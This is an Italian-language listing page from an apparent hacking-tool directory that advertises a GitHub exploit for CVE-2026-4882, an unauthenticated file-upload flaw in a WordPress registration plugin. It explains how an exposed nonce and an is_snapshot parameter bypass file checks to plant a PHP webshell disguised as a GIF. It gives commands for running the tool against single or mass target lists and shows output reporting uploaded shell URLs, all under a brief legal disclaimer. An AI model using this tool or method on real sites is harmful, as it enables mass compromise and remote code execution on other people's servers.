Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File non Autenticato | Kitploit
Strumenti/GitHubGitHub/xshadow-here/cve-2026-4882
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed Teaming
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File non Autenticato

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File Non Autenticato

Descrizione :

User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File Non Autenticato Il plugin User Registration Advanced Fields per WordPress (versioni fino alla 1.6.20 incluse) è vulnerabile al caricamento arbitrario di file non autenticato tramite l'azione AJAX uraf_profile_picture_upload_method_upload. Il plugin espone un nonce valido attraverso wp_localize_script() su qualsiasi pagina contenente un modulo di registrazione e, utilizzando il parametro is_snapshot=1, bypassa completamente la validazione dell'estensione del file. Ciò consente ad attaccanti non autenticati di caricare file arbitrari (ad esempio webshell PHP mascherate da immagini GIF), che vengono memorizzati in wp-content/uploads/user_registration_uploads/temp-uploads/, portando alla completa esecuzione di codice remoto (RCE).

INFO : CVE-2026-4882

~ Punteggio CVSS: 9.8 (Critico)

~ Versioni Affette: <= 1.6.20

  • Ricercatore : 0xd4rk5id3 - EnvoraSec

utilizzo :

Singolo target :

  • python3 shadow.py -u https://target.com -s shadow.php

Target multipli :

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

Modalità interattiva :

  • python3 shadow.py
  • inserisci il nome del file dei target
  • inserisci il numero di thread (1-50 max)

caratteristiche :

  • Multi-threading
  • Gestione degli errori
  • Rilevamento automatico di Nonce e Form ID
  • Crawling di Homepage e Sitemap (percorsi personalizzati di registrazione)
  • Fallback con Brute Force del Form ID
  • Risoluzione automatica dei reindirizzamenti HTTP/HTTPS
  • Caricamento di shell poliglotta GIF89a
  • Verifica della shell
  • Salvataggio automatico dei risultati in shell.txt

output :

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

Disclaimer :

Questo strumento è solo per scopi educativi e di test di sicurezza.

L'uso non autorizzato di sistemi che non possiedi o per i quali non hai il permesso di testare è illegale.

Scarica lo strumento